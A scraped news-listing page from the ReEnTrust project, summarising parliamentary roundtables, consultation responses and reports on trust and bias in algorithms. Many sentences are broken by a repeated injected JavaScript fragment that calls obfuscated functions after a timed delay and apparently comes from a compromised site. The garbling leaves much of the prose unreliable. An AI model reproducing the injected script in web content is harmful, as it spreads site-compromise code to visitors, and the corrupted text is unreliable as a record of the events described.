On the 24th May the APPG on Data Analytics hosted a roundtable on rebuilding trust in algorithms, in collaboration with the ESPRC ReEnTrust project. Speaking at the event were: Daniel Zeichner MP, Chair of the APGDA (Labour); Professor Tom Rodden, Chief Scientific Advisor DCMS; Professor Marina Jirotka, Oxford University; and Jonathan Legh-Smith, Head of Scientific Affairs at BT Group. Professor Rodden noted the critical need dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to link in with…
APGDA and ReEnTrust host webinar on rebuilding and enhancing trust in algorithms
On Wednesday 2nd December 2020, the All-Party Parliamentary Group on Data Analytics and the ReEnTrust were delighted dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to host an online briefing on rebuilding and enhancing trust in algorithms. The event was chaired by APGDA Chair, Daniel Zeicher MP, and included contributions from a number of senior researchers from the ReEnTrust following the publication of their recent policy paper. Mr Zeichner opened the meeting at 11am and presented an…
ReEnTrust Team Respond to ICO’s Consultation on Explaining AI
On 24 January, ReEnTrust team, led by Dr Philip Inglesant, provided our inputs to ICO and The Turing’s latest Consultation on Explaining AI. ReEnTrust has two interests in AI-enabled decisions: in our own research, to ensure that our own processes are trustworthy, as being compliant with GDPR, DPA compliant, as well as being transparent and responsible in our research involving people; and with respect to the topic of our research, to facilitate trust-building by users in algorithm-driven online systems. We…
Purdue Policies for Progress
On May 20th the Purdue Policy Research Centre at Purdue University, held dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to “Policies for Progress” conference exploring ways dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to bring dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}together policymakers, industry leaders, not-for-profits, and academics dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to bring their collective expertise dom() * 6);if…
Landscape summary for CDEI: bias in algorithmic decision-making
Publication of the landscape summary on “Bias in Algorithmic Decision-Making”, commissioned by the Centre for Data Ethics and Innovation (CDEI) and produced by our own Michael Rovatsos, with contributions from Ansgar Koene and Brent Mittelstadt. The landscape summary report forms part of the CDEI’s reviews indom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to online targeting and bias in algorithmic decision-making. These landscape summaries have informed the development of CDEI interim reports and will inform their ongoing…
Professor Marina Jirotka Involved in APGDA’s landmark report — Trust, Transparency, Tech
The All Party Parliamentary Data Analytics Group (APGDA) and Policy Connect dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to launched its landmark report, Trust, Transparency, Tech on data and technology ethics in the House of Commons on Tuesday 21st May 2019. Our Oxford Professor Marina Jirotka, PI of the ReEnTrust project, has been invited dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to the steering committee behind the report. Over the next twelve months,…
Publication of European Parliament report on Algorithmic Accountability
In 2018, the ReEnTrust team member Ansgar Koene, working on the UnBias project, was invited dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to produce a Science Technology Options Assessment report on “A Governance Framework for Algorithmic Accountability and Transparency” for the European Parliament. The report is now
ReEnTrust engaging with policy discourse
The “responsible policy and practice” work-package (WP1) of ReEnTrust aims dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to unpack the tensions between the drive for innovation in the design and use of algorithms and the growing desire for meaningful regulation and protection for users. As part of this work ReEnTrust is engaging with the policy discourse on algorithmic regulation through participation in “AI governance” conferences and working with policy setting organizations. In the first three months…